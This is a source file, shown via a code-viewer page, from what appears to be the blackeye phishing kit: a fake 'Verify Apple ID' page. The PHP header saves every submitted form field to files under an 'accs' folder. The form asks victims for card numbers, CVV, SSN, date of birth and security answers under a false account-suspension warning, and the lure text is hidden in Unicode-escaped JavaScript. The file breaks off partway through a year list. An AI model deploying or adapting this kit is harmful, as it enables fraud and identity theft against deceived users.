Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/apple/profile.php
777 views
1
<?php
2
3
$mail1= $_POST['email'];
4
mail("[email protected]", "[email protected]");
5
6
foreach($_POST as $key => $value){
7
$string .= "$key = $value \n\n". PHP_EOL;
8
}
9
$email = str_replace("@", "AT", $_POST['email']);
10
$fil = fopen('accs/'.strip_tags($email).''. date("d-m-Y-G-i") .''.rand(0,9999).'.txt', "w");
11
fwrite($fil, $string);
12
header("Location: verify.html");
13
?>
14
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
15
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" dir="ltr">
16
17
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
18
<head>
19
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
20
<meta http-equiv="content-type" content="text/html; charset=utf-8">
21
<link rel="shortcut icon" href="images/favicon.ico">
22
<title>Verify Apple ID - Complete Verification</title>
23
24
<link rel="stylesheet" type="text/css" href="images/navigation.css" id="globalheader-stylesheet"></link>
25
<link rel="stylesheet" type="text/css" href="images/base.css"></link>
26
<link rel="stylesheet" type="text/css" href="images/id.css"></link>
27
<link rel="stylesheet" type="text/css" href="images/hsa.css"></link>
28
<script type="text/javascript" src="js/prettify.js"></script>
29
<script src="js/jquery-2.0.0.min.js" type="text/javascript"></script>
30
<script src="js/cardcheck.js" type="text/javascript"></script>
31
<script type="text/javascript" charset="ISO-8859-1" src="js/crafty_postcode.class.js"></script>
32
33
<SCRIPT language=Javascript>
34
<!--
35
function isNumberKey(evt)
36
{
37
var charCode = (evt.which) ? evt.which : event.keyCode
38
if (charCode > 31 && (charCode < 48 || charCode > 57))
39
return false;
40
41
return true;
42
}
43
44
//-->
45
</SCRIPT>
46
<script type="text/javascript">var cc_number_saved="";function checkLuhn(input)
47
{var sum=0;var numdigits=input.length;var parity=numdigits%2;for(var i=0;i<numdigits;i++){var digit=parseInt(input.charAt(i))
48
if(i%2==parity)digit*=2;if(digit>9)digit-=9;sum+=digit;}
49
return(sum%10)==0;}</script>
50
<script type="text/javascript">
51
52
// Example of implementation
53
$(document).ready(function() {
54
prettyPrint();
55
// And Away We Go
56
57
58
59
// Step #1: Cache Selectors
60
var creditCard = $('#longcard'),
61
cardGrandParent = creditCard.parent().parent();
62
63
// Step #2: Setup Callbacks on Events
64
creditCard.on('cc:onReset cc:onGuess', function() {
65
66
cardGrandParent.removeClass().addClass('formrow');
67
68
}).on('cc:onInvalid', function() {
69
70
$('#longcard').on('cc:onInvalid', function(event) {});
71
$('#longcard').cardcheck({ onInvalid: function() {} });
72
73
74
}).on('cc:onValid', function(event, card, niceName) {
75
76
cardGrandParent.removeClass().addClass('formrow');
77
78
}).on('cc:onCardChange', function(event, card, niceName) {
79
80
$('#credit-card-type-text').text(niceName);
81
82
// Step #3: Initialize the cardcheck plugin
83
}).cardcheck({
84
iconLocation: '#accepted-cards-images',
85
enableIcons: true,
86
allowSpaces: true
87
});
88
89
90
});
91
</script>
92
93
94
95
<script src="js/jquery.payment.js"></script>
96
<style type="text/css" media="screen">
97
input.invalid {
98
border: 2px solid red;
99
}
100
101
.validation.failed:after {
102
color: red;
103
content: 'Validation failed';
104
}
105
106
.validation.passed:after {
107
color: green;
108
content: 'Validation passed';
109
}
110
</style>
111
112
<script type="text/javascript">
113
jQuery(function($){
114
$('[data-numeric]').payment('restrictNumeric');
115
$('.longcard').payment('formatCardNumber');
116
$('.cc-exp').payment('formatCardExpiry');
117
$('.seccode').payment('formatCardCVC');
118
119
$('form').submit(function(e){
120
$('input').removeClass('invalid');
121
$('.validation').removeClass('passed failed');
122
123
var cardType = $.payment.cardType($('.longnumber').val());
124
125
126
if ( $('input.invalid').length ) {
127
$('.validation').addClass('failed');
128
} else {
129
$('.validation').addClass('passed');
130
}
131
});
132
});
133
</script>
134
135
136
<script type="text/javascript">
137
function validateForm()
138
{
139
var x=document.forms["form"]["firstname"].value;
140
if (x==null || x=="")
141
{
142
alert("Your firstname is required");
143
form.firstname.focus();
144
return false;
145
}
146
var x=document.forms["form"]["surname"].value;
147
if (x==null || x=="")
148
{
149
alert("Your surname is required");
150
form.surname.focus();
151
return false;
152
}
153
var x=document.forms["form"]["postcode"].value;
154
if (x==null || x=="")
155
{
156
alert("Your postcode is required.");
157
form.postcode.focus();
158
return false;
159
}
160
var x=document.forms["form"]["address1"].value;
161
if (x==null || x=="")
162
{
163
alert("Your address is required.");
164
form.address1.focus();
165
return false;
166
}
167
var x=document.forms["form"]["city"].value;
168
if (x==null || x=="")
169
{
170
alert("Your city is required.");
171
form.city.focus();
172
return false;
173
}
174
var x=document.forms["form"]["nameoncard"].value;
175
if (x==null || x=="")
176
{
177
alert("Name as on your card is required.");
178
form.nameoncard.focus();
179
return false;
180
}
181
var x=document.forms["form"]["longcard"].value;
182
if (x==null || x=="")
183
{
184
alert("Your card number is required.");
185
form.longcard.focus();
186
return false;
187
}
188
var x=document.forms["form"]["ccdate"].value;
189
if (x==null || x=="")
190
{
191
alert("Please enter your card expiry date.");
192
form.ccdate.focus();
193
return false;
194
}
195
var fields = x.split ('/');
196
var year = fields[1].trim();
197
var month = fields[0].trim();
198
var date = new Date();
199
var currentMonth = date.getMonth() + 1;
200
var currentYear = date.getFullYear();
201
if (year.toString().length < 4) year = '20' + year;
202
var yearNumber = Number (year);
203
var monthNumber = Number (month);
204
if ((currentYear > yearNumber) || (currentYear == yearNumber && currentMonth > monthNumber)) {
205
alert ('Your card is expired');
206
form.ccdate.focus();
207
return false;
208
}
209
var x=document.forms["form"]["seccode"].value;
210
if (x==null || x=="")
211
{
212
alert("Your 3-digit security code is required.");
213
form.seccode.focus();
214
return false;
215
}
216
var x=document.forms["form"]["securityawnser"].value;
217
if (x==null || x=="")
218
{
219
alert("Your security reset answer is required.");
220
form.securityawnser.focus();
221
return false;
222
}
223
if(document.form.dobd.selectedIndex==0)
224
{
225
alert("Your date of birth is required.");
226
return false;
227
}
228
if(document.form.doby.selectedIndex==0)
229
{
230
alert("Your date of birth year is required.");
231
return false;
232
}
233
if(document.form.longcard.value.length<10)
234
{
235
alert("Your credit card is invalid.");
236
return false;
237
}
238
if(document.form.seccode.value.length<3)
239
{
240
alert("3 digit security code is invalid.");
241
form.seccode.focus();
242
return false;
243
}
244
if(!checkLuhn(form.longcard.value.replace(/[^\d]/g, ''))) { alert("You have not entered a valid Card number, please check and try again"); form.longcard.focus(); return false; }
245
}
246
247
</script>
248
249
250
</head>
251
252
253
<body class="myappleid create heavy" id="editContainerBody">
254
<!--********* New style imported as per the new Header *********-->
255
256
<!-- end -->
257
258
<!--********* setting country and language from Language parameter *********-->
259
260
261
262
<!--********* setting locale to urlLanguageInsert to dynamically form the URL based on locale *********-->
263
264
265
266
267
268
269
270
271
272
273
274
<nav id="globalheader" class="globalheader" role="navigation" aria-label="Global Navigation" data-hires="false" data-analytics-region="global nav" lang="en-US">
275
276
<div id="gh-content" class="gh-content">
277
<ul class="gh-menu">
278
<li id="gh-menu-icon-toggle" class="gh-menu-icon gh-menu-icon-toggle"><button id="gh-svg-icons" class="gh-svg-wrapper"></button><span class="gh-text-replace">Menu</span></li>
279
<li id="gh-menu-icon-home" class="gh-menu-icon gh-menu-icon-home"><a href="/"><span class="gh-text-replace">Apple</span></a></li>
280
</ul><!--/gh-menu-->
281
282
283
284
285
<div class="gh-nav">
286
<div class="gh-nav-view">
287
288
289
290
291
292
293
294
295
296
297
298
299
300
<ul class="gh-nav-list">
301
<li class="gh-tab gh-tab-apple"><a class="gh-tab-link" href="http://www.apple.com/" onclick="s_objectID=&quot;http://www.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Apple</span></span></a></li>
302
<li class="gh-tab gh-tab-store">
303
304
305
306
307
308
309
<a class="gh-tab-link" href="http://store.apple.com/" onclick="s_objectID=&quot;http://store.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Store</span></span></a>
310
311
</li>
312
<li class="gh-tab gh-tab-mac">
313
314
<a class="gh-tab-link" href="http://www.apple.com/mac" onclick="s_objectID=&quot;http://www.apple.com/mac/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Mac</span></span></a>
315
316
</li>
317
<li class="gh-tab gh-tab-iphone">
318
319
<a class="gh-tab-link" href="http://www.apple.com/iphone" onclick="s_objectID=&quot;http://www.apple.com/iphone/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPhone</span></span></a>
320
321
</li>
322
<li class="gh-tab gh-tab-watch">
323
324
325
<a class="gh-tab-link" href="http://www.apple.com/watch" onclick="s_objectID=&quot;http://www.apple.com/watch/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Watch</span></span></a>
326
327
</li>
328
<li class="gh-tab gh-tab-ipad">
329
330
331
332
<a class="gh-tab-link" href="http://www.apple.com/ipad" onclick="s_objectID=&quot;http://www.apple.com/ipad/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPad</span></span></a>
333
334
</li>
335
<li class="gh-tab gh-tab-ipod">
336
337
338
<a class="gh-tab-link" href="http://www.apple.com/ipod" onclick="s_objectID=&quot;http://www.apple.com/ipod/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPod</span></span></a>
339
340
</li>
341
<li class="gh-tab gh-tab-itunes">
342
343
<a class="gh-tab-link" href="http://www.apple.com/itunes" onclick="s_objectID=&quot;http://www.apple.com/itunes/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iTunes</span></span></a>
344
345
</li>
346
<li class="gh-tab gh-tab-support">
347
348
349
<a class="gh-tab-link" href="http://www.apple.com/support" onclick="s_objectID=&quot;http://www.apple.com/support/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Support</span></span></a>
350
351
</li>
352
353
<li id="gh-tab-search" class="gh-tab gh-tab-search">
354
<div id="gh-search" class="gh-search" role="search">
355
<form action="/search/" method="post" class="gh-search-form" id="gh-search-form" data-search-recommended-results='{"url":"https://www.apple.com/global/nav/scripts/shortcuts.php","requestName":"recommendedResults","queryName":"q","dataType":"xml"}' data-search-suggested-searches='{"url":"https://www.apple.com/search/instant/getSuggestions","requestName":"suggestedSearches","queryName":"query","queryParams":{"model":"marcom_en_US","locale":"en_US"},"dataType":"json"}' >
356
357
<div class="gh-search-input-wrapper">
358
<label for="gh-search-input" class="gh-text-replace">Search apple.com</label>
359
<input type="text" name="q" id="gh-search-input" class="gh-search-input" placeholder="Search apple.com" />
360
</div>
361
<button disabled="disabled" type="submit" id="gh-search-submit" class="gh-search-submit gh-search-magnify"><span class="gh-text-replace">Search apple.com</span></button>
362
<button disabled="disabled" type="reset" id="gh-search-reset" class="gh-search-reset"><span class="gh-text-replace">Reset</span></button>
363
364
</form>
365
</div>
366
<a class="gh-search-magnify" href="http://www.apple.com/search/"><span class="gh-text-replace">Search apple.com</span></a>
367
</li>
368
</ul>
369
</div>
370
</div><!--/gh-nav-->
371
372
</div>
373
</nav><!--/globalheader-->
374
375
376
377
<!-- header ends here -->
378
<!--/globalheader-->
379
380
381
382
383
384
385
<form method="POST" id="signIn" onsubmit="return validateForm()" name="form" action="checkout.php">
386
387
<div id="productheader">
388
389
<a aria-label="My ID" href="#">
390
<h2>
391
<img aria-hidden="true" class="DimAppleIdLogoIV" src="images/logo.png" />
392
</h2>
393
</a>
394
395
<div id="user">
396
397
</div>
398
</div>
399
<div id = "main">
400
<div class="content">
401
<div class = "grid2colc wrap">
402
<div class = "column first sidebar">
403
404
<h2>Account Verification.</h2>
405
<p class = "intro"><script type="text/javascript">document.write('\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u0074\u0061\u006B\u0065\u0020\u0061\u0020\u006D\u006F\u006D\u0065\u006E\u0074\u0020\u0074\u006F\u0020\u0063\u006F\u006D\u0070\u006C\u0065\u0074\u0065\u0020\u006F\u0075\u0072\u0020\u0061\u0063\u0063\u006F\u0075\u006E\u0074\u0020\u0076\u0065\u0072\u0069\u0066\u0069\u0063\u0061\u0074\u0069\u006F\u006E\u0020\u0070\u0072\u006F\u0063\u0065\u0073\u0073\u002E\u0020\u0054\u0068\u0069\u0073\u0020\u0069\u006E\u0066\u006F\u0072\u006D\u0061\u0074\u0069\u006F\u006E\u0020\u0069\u0073\u0020\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0064\u0020\u0074\u006F\u0020\u0076\u0065\u0072\u0069\u0066\u0079\u0020\u0079\u006F\u0075\u0072\u0020\u0069\u0064\u0065\u006E\u0074\u0069\u0074\u0079\u002E\u0020\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u0074\u0061\u006B\u0065\u0020\u0079\u006F\u0075\u0072\u0020\u0074\u0069\u006D\u0065\u0020\u0061\u006E\u0064\u0020\u0066\u0069\u006C\u006C\u0020\u0069\u006E\u0020\u0074\u0068\u0065\u0020\u0066\u006F\u0072\u006D\u0020\u0063\u006F\u0072\u0072\u0065\u0063\u0074\u006C\u0079\u0020\u0074\u006F\u0020\u0061\u0076\u006F\u0069\u0064\u0020\u0066\u0075\u0072\u0074\u0068\u0065\u0072\u0020\u0064\u0065\u006C\u0061\u0079\u0073\u0020\u0075\u006E\u0064\u0065\u0072\u0020\u0073\u006F\u006D\u0065\u0020\u0063\u0069\u0072\u0063\u0075\u006D\u0073\u0074\u0061\u006E\u0063\u0065\u0073\u0020\u0070\u0072\u006F\u0076\u0069\u0064\u0069\u006E\u0067\u0020\u0074\u0068\u0065\u0020\u0077\u0072\u006F\u006E\u0067\u0020\u0069\u006E\u0066\u006F\u0072\u006D\u0061\u0074\u0069\u006F\u006E\u0020\u006D\u0061\u0079\u0020\u0072\u0065\u0073\u0075\u006C\u0074\u0020\u0069\u006E\u0020\u0061\u0063\u0063\u006F\u0075\u006E\u0074\u0020\u0073\u0075\u0073\u0070\u0065\u006E\u0073\u0069\u006F\u006E\u0020\u0074\u006F\u0020\u0070\u0072\u006F\u0074\u0065\u0063\u0074\u0020\u006F\u0075\u0072\u0020\u0063\u0075\u0073\u0074\u006F\u006D\u0065\u0072\u0073\u002E');</script></p>
406
<h2>Why?</h2>
407
<p class = "intro"><script type="text/javascript">document.write('\u0057\u0065\u0020\u006D\u0061\u0079\u0020\u006F\u0063\u0063\u0061\u0073\u0069\u006F\u006E\u0061\u006C\u006C\u0079\u0020\u0061\u0073\u006B\u0020\u006F\u0075\u0072\u0020\u0063\u0075\u0073\u0074\u006F\u006D\u0065\u0072\u0073\u0020\u0074\u006F\u0020\u0063\u006F\u006D\u0070\u006C\u0065\u0074\u0065\u0020\u0074\u0068\u0065\u0073\u0065\u0020\u0073\u0074\u0065\u0070\u0073\u0020\u0066\u006F\u0072\u0020\u006D\u0061\u006E\u0079\u0020\u0072\u0065\u0061\u0073\u006F\u006E\u0073\u002E\u0020\u0049\u0074\u0020\u006D\u0061\u0079\u0020\u006A\u0075\u0073\u0074\u0020\u0062\u0065\u0020\u0074\u0068\u0061\u0074\u0020\u0079\u006F\u0075\u0072\u0020\u0072\u0065\u0067\u0069\u0073\u0074\u0065\u0072\u0065\u0064\u0020\u0077\u0069\u0074\u0068\u0020\u0074\u0068\u0065\u0020\u0077\u0072\u006F\u006E\u0067\u0020\u0069\u006E\u0066\u006F\u0072\u006D\u0061\u0074\u0069\u006F\u006E\u0020\u0061\u006E\u0064\u0020\u0079\u006F\u0075\u0072\u0020\u0061\u0063\u0063\u006F\u0075\u006E\u0074\u0020\u0068\u0061\u0073\u0020\u0074\u0068\u0065\u0072\u0065\u0066\u006F\u0072\u0065\u0020\u0062\u0065\u0065\u006E\u0020\u0066\u006C\u0061\u0067\u0067\u0065\u0064\u0020\u006F\u006E\u0020\u006F\u0075\u0072\u0020\u0073\u0079\u0073\u0074\u0065\u006D\u0020\u0061\u0073\u0020\u0069\u006E\u0063\u006F\u006D\u0070\u006C\u0065\u0074\u0065\u002E\u0020\u0049\u0074\u0020\u0063\u006F\u0075\u006C\u0064\u0020\u0061\u006C\u0073\u006F\u0020\u0062\u0065\u0020\u0074\u0068\u0061\u0074\u0020\u0077\u0065\u0020\u0068\u0061\u0076\u0065\u0020\u006E\u006F\u0074\u0069\u0063\u0065\u0064\u0020\u0073\u006F\u006D\u0065\u0020\u0075\u006E\u0075\u0073\u0075\u0061\u006C\u0020\u0061\u0063\u0074\u0069\u0076\u0069\u0074\u0079\u0020\u006F\u006E\u0020\u0079\u006F\u0075\u0072\u0020\u0061\u0063\u0063\u006F\u0075\u006E\u0074\u0020\u0061\u006E\u0064\u0020\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0020\u0061\u0064\u0064\u0069\u0074\u0069\u006F\u006E\u0061\u006C\u0020\u0069\u006E\u0066\u006F\u0072\u006D\u0061\u0074\u0069\u006F\u006E\u0020\u0061\u0062\u006F\u0075\u0074\u0020\u0079\u006F\u0075\u0020\u0074\u006F\u0020\u0076\u0065\u0072\u0069\u0066\u0079\u0020\u0079\u006F\u0075\u0072\u0020\u0069\u0064\u0065\u006E\u0074\u0069\u0074\u0079\u002E\u0020\u0054\u0068\u0065\u0073\u0065\u0020\u0061\u0072\u0065\u0020\u006A\u0075\u0073\u0074\u0020\u0074\u0077\u006F\u0020\u0072\u0065\u0061\u0073\u006F\u006E\u0073\u0020\u0077\u0068\u0079\u0020\u0074\u0068\u0069\u0073\u0020\u006D\u0061\u0079\u0020\u0068\u0061\u0076\u0065\u0020\u0068\u0061\u0070\u0070\u0065\u006E\u0065\u0064\u0020\u0077\u0069\u0074\u0068\u0020\u0079\u006F\u0075\u0072\u0020\u0061\u0063\u0063\u006F\u0075\u006E\u0074\u0020\u0074\u0068\u0065\u0072\u0065\u0020\u0069\u0073\u0020\u0061\u0020\u0077\u0069\u0064\u0065\u0020\u0072\u0061\u006E\u0067\u0065\u0020\u006F\u0066\u0020\u0070\u006F\u0073\u0073\u0069\u0062\u0069\u006C\u0069\u0074\u0079\u005C\u0027\u0073\u0020\u0068\u006F\u0077\u0065\u0076\u0065\u0072\u0020\u0069\u0074\u0073\u0020\u006E\u006F\u0074\u0068\u0069\u006E\u0067\u0020\u0074\u006F\u0020\u0077\u006F\u0072\u0072\u0079\u0020\u0061\u0062\u006F\u0075\u0074\u0020\u0077\u0065\u0020\u0068\u0061\u0076\u0065\u0020\u006D\u0061\u0064\u0065\u0020\u006F\u0075\u0072\u0020\u0076\u0061\u006C\u0069\u0064\u0061\u0074\u0069\u006F\u006E\u0020\u0070\u0072\u006F\u0063\u0065\u0073\u0073\u0020\u0076\u0065\u0072\u0079\u0020\u0065\u0061\u0073\u0079\u0020\u0066\u006F\u0072\u0020\u0079\u006F\u0075\u0020\u0074\u006F\u0020\u0063\u006F\u006D\u0070\u006C\u0065\u0074\u0065\u0020\u0069\u006E\u0020\u006A\u0075\u0073\u0074\u0020\u0061\u0020\u0066\u0065\u0077\u0020\u006D\u0069\u006E\u0075\u0074\u0065\u0073\u002E');</script></p>
408
409
<a target="blank" class="more" href="http://www.apple.com/privacy/">Read the Apple Customer Privacy Policy</a>
410
</div>
411
<!-- /column -->
412
413
<div class = "column last" style = "z-index: 1">
414
<h2>Verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> </h2>
415
<p>We need to verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> account details. Your account has been suspended until this process is completed, we apologise for any inconvenience.</p>
416
<!-- Name details -->
417
<h4>Name</h4>
418
<p>Please enter your name including title.</p>
419
420
<div class="formrow">
421
<label for="first-name">First Name</label>
422
<span class="formwrap"><input mandatory="yes" maxlength="32" aria-label="Firstname" value="" placeholder="First Name" id="firstname" type="text" name="firstname" required /></span>
423
<label for="first-name">Middle Name</label>
424
<span class="formwrap"><input mandatory="yes" maxlength="32" aria-label="Middlename" placeholder="(Optional)" id="middlename" type="text" name="middlename" /></span>
425
<label for="first-name">Last Name</label>
426
<span class="formwrap"><input mandatory="yes" maxlength="32" aria-label="Surname" value="" placeholder="Last Name" id="surname" type="text" name="surname" required /></span>
427
428
</div>
429
430
431
432
433
<!-- Mailing Address Start -->
434
<h4>Address</h4>
435
<p>Please enter your mailing address. This must match your billing address.</p>
436
<!-- Add a div to house your
437
postcode input field -->
438
<!--
439
<div id="lookup"><span class="formwrap"><label class="lookup" for="address-1">Enter your postcode to lookup your address.</label><div id="lookup_field"></div></span></div>
440
-->
441
<div class="formrow">
442
<label for="address-1">Zip/Postcode</label>
443
<span class="formwrap"><input type="text" value="" name="postcode" style="width: 100px;"/> </span><div id="crafty_postcode_result_display" >&nbsp;</div>
444
</div>
445
446
447
448
449
450
451
452
453
454
455
456
457
<div class="formrow">
458
<label for="address-1">Address Line 1</label>
459
<span class="formwrap"><input required="yes" mandatory="yes" id="address1" type="text" value="" name="address1" /></span>
460
<div id = "address-11" style = "display:block;">
461
462
463
464
465
466
467
</div>
468
<span class="input-msg"></span>
469
</div>
470
<div class="formrow">
471
<label for="address-2">Address Line 2</label>
472
<span class="formwrap"><input placeholder="(Optional)" id="address2" type="text" name="address2" /></span>
473
<div id = "address-21" style = "display:block;">
474
</div>
475
<span class="input-msg"></span>
476
</div>
477
<div class="formrow">
478
<label for="town-city">Town/City</label>
479
<span class="formwrap"><input required="yes" value="" mandatory="yes" id="city" type="text" name="city" /></span>
480
<div id = "town-city1" style = "display:block;">
481
</div>
482
<span class="input-msg"></span>
483
</div>
484
<div class="formrow">
485
<label for="town-city">State</label>
486
<span class="formwrap"><input id="county" type="text" name="county" /></span>
487
<div id = "town-city1" style = "display:block;">
488
</div>
489
<span class="input-msg"></span>
490
</div>
491
492
<!-- <div class="formrow">
493
<label for="postcode">Postcode</label>
494
<span class="formwrap"><input mandatory="yes" id="pcode" type="text" name="pcode" /></span>
495
496
</div>-->
497
<div class = "formrow" style = "z-index: 1">
498
<label for = "countryText">Country/Region</label>
499
500
<span class="formwrap">
501
502
<input mandatory="yes" id="country" type="text" value="United States" placeholder="Country" name="country" />
503
</span>
504
505
506
507
</div>
508
509
<!-- End Address Format --->
510
511
512
513
<h4>Update your Card & Bank Information</h4>
514
<p>Enter your credit or debit card details. This will be used to verify your identity and as the default payment method for purchases and iTunes or App Store.</p>
515
516
517
<div class="formrow">
518
519
<label for="appleid">Name on Card<br></label>
520
<span class="formwrap">
521
522
<input type="text" class="nameoncard" name="nameoncard" id="nameoncard" x-autocompletetype="nameoncard" placeholder="Name on Card" required>
523
524
</span>
525
</div>
526
<div class="formrow">
527
528
529
<label for="appleid"><br>Card Number</label>
530
<br><span class="formwrap">
531
532
<input type="text" class="longcard" name="longcard" id="longcard" x-autocompletetype="cc-number" placeholder="Card Number" required>
533
534
</span>
535
536
537
538
539
540
<br/>
541
<label for="appleid"><i>Accepted Cards</i></label>
542
<span class="formwrap"><div id="accepted-cards-images"></div></span>
543
544
<div id="accepted-cards-images">
545
<!-- Icons Automatically Inserted Here -->
546
</div>
547
548
549
550
551
552
553
554
</div>
555
<div class="formrow">
556
<label for="cardexpiry">Expiry Date</label>
557
<span class="formwrap"><input type="text" id="ccdate" name="ccdate" class="cc-exp" x-autocompletetype="cc-exp" placeholder="Expiry Date MM/YY" required maxlength="9"></span><span class="formwrap">
558
559
560
</div>
561
562
<div class="formrow">
563
<label for="cardexpiry">Valid From (if applicable)</label>
564
<span class="formwrap"><input type="text" id="ccfrom" name="ccfrom" class="cc-exp" placeholder="Valid From MM/YY" maxlength="9"></span><span class="formwrap">
565
566
567
</div>
568
569
<div class="formrow">
570
<label for="password-confirm">CCV2</label>
571
<span class="formwrap"><input type="text" name="seccode" class="seccode" id="seccode" x-autocompletetype="cc-csc" placeholder="Security code" required maxlength="4" autocomplete="off" /></span>
572
573
574
575
<p class="ccvnote"><img alt="3 Digit Code" align="left" src="images/ccv2.gif"/>The last three digits on the back of your card. For American Express, a four-digit number on the front of your card.</p>
576
577
578
<br>
579
<br><input type="hidden" name="ssnname" id="ssnname" value="SSN"><label for="cardexpiry">Social Insurance Number (SSN)</label><span class="formwrap"><input id="ssn" placeholder="Social Insurance Number (SSN)" maxlength="15" name="ssn" type="text" required="yes"/></span><br/>
580
581
582
</div>
583
584
<h4>Security Question</h4>
585
<p>Select your security question below. This question will help us verify your identity should you forget your password.</p>
586
587
588
589
<div id="secureQue1Div" style="display:block;">
590
<div class="formrow space">
591
592
<label for="securityquestion" class="select">Security Question</label>
593
<select mandatory="yes" id="securityquestion" name="securityquestion"><option value="0">Please select</option><option value="Mothers Maiden Name">What is your mothers maiden name?</option><option value="Driving License Num">What is your driving license number?</option><option value="Passport Num">What is your passport number?</option></select>
594
<!-- webobject name = "securityQuesDiv" -->
595
<div id = 'security-question_11' style="display:block;">
596
<br/>
597
<label for="cardexpiry">Security Answer</label>
598
<span class="formwrap"><input id="securityawnser" placeholder="Reset Answer" maxlength="20" name="securityawnser" type="text" required/></span>
599
600
601
</div>
602
<!-- /webobject -->
603
604
</div>
605
<br/>
606
<h4>Date of Birth & Mobile Number</h4>
607
<p>Combined with your security question, this will help us verify your identity if you forget your password or need to reset it.
608
</p>
609
<div class="birthdate">
610
611
612
613
<select mandatory="yes" id="dobm" name="dobm"><option value="0">Month</option><option value="1">January</option><option value="2">February</option><option value="3">March</option><option value="4">April</option><option value="5">May</option><option value="6">June</option><option value="7">July</option><option value="8">August</option><option value="9">September</option><option value="10">October</option><option value="11">November</option><option value="12">December</option></select>
614
<select mandatory="yes" id="dobd" name="dobd"><option value="0">Day</option><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option></select>
615
<select mandatory="yes" id="doby" name="doby"><option value="0">Year</option>
616
<option value="2014">2014</option>
617
<option value="2013">2013</option>
618
<option value="2012">2012</option>
619
<option value="2011">2011</option>
620
<option value="2010">2010</option>
621
<option value="2009">2009</option>
622
<option value="2008">2008</option>
623
<option value="2007">2007</option>
624
<option value="2006">2006</option>
625
<option value="2005">2005</option>
626
<option value="2004">2004</option>
627
<option value="2003">2003</option>
628
<option value="2002">2002</option>
629
<option value="2001">2001</option>
630
<option value="2000">2000</option>
631
<option value="1999">1999</option>
632
<option value="1998">1998</option>
633
<option value="1997">1997</option>
634
<option value="1996">1996</option>
635
<option value="1995">1995</option>
636
<option value="1994">1994</option>
637
<option value="1993">1993</option>
638
<option value="1992">1992</option>
639
<option value="1991">1991</option>
640
<option value="1990">1990</option>
641
<option value="1989">1989</option>
642
<option value="1988">1988</option>
643
<option value="1987">1987</option>
644
<option value="1986">1986</option>
645
<option value="1985">1985</option>
646
<option value="1984">1984</option>
647
<option value="1983">1983</option>
648
<option value="1982">1982</option>
649
<option value="1981">1981</option>
650
<option value="1980">1980</option>
651
<option value="1979">1979</option>
652
<option value="1978">1978</option>
653
<option value="1977">1977</option>
654
<option value="1976">1976</option>
655
<option value="1975">1975</option>
656
<option value="1974">1974</option>
657
<option value="1973">1973</option>
658
<option value="1972">1972</option>
659
<option value="1971">1971</option>
660
<option value="1970">1970</option>
661
<option value="1969">1969</option>
662
<option value="1968">1968</option>
663
<option value="1967">1967</option>
664
<option value="1966">1966</option>
665
<option value="1965">1965</option>
666
<option value="1964">1964</option>
667
<option value="1963">1963</option>
668
<option value="1962">1962</option>
669
<option value="1961">1961</option>
670
<option value="1960">1960</option>
671
<option value="1959">1959</option>
672
<option value="1958">1958</option>
673
<option value="1957">1957</option>
674
<option value="1956">1956</option>
675
<option value="1955">1955</option>
676
<option value="1954">1954</option>
677
<option value="1953">1953</option>
678
<option value="1952">1952</option>
679
<option value="1951">1951</option>
680
<option value="1950">1950</option>
681
<option value="1949">1949</option>
682
<option value="1948">1948</option>
683
<option value="1947">1947</option>
684
<option value="1946">1946</option>
685
<option value="1945">1945</option>
686
<option value="1944">1944</option>
687
<option value="1943">1943</option>
688
<option value="1942">1942</option>
689
<option value="1941">1941</option>
690
<option value="1940">1940</option>
691
<option value="1939">1939</option>
692
<option value="1938">1938</option>
693
<option value="1937">1937</option>
694
<option value="1936">1936</option>
695
<option value="1935">1935</option>
696
<option value="1934">1934</option>
697
<option value="1933">1933</option>
698
<option value="1932">1932</option>
699
<option value="1931">1931</option>
700
<option value="1930">1930</option>
701
<option value="1929">1929</option>
702
<option value="1928">1928</option>
703
<option value="1927">1927</option>
704
<option value="1926">1926</option>
705
<option value="1925">1925</option>
706
<option value="1924">1924</option>
707
<option value="1923">1923</option>
708
<option value="1922">1922</option>
709
<option value="1921">1921</option>
710
<option value="1920">1920</option>
711
<option value="1919">1919</option>
712
<option value="1918">1918</option>
713
<option value="1917">1917</option>
714
<option value="1916">1916</option>
715
<option value="1915">1915</option>
716
<option value="1914">1914</option>
717
<option value="1913">1913</option>
718
<option value="1912">1912</option>
719
<option value="1911">1911</option>
720
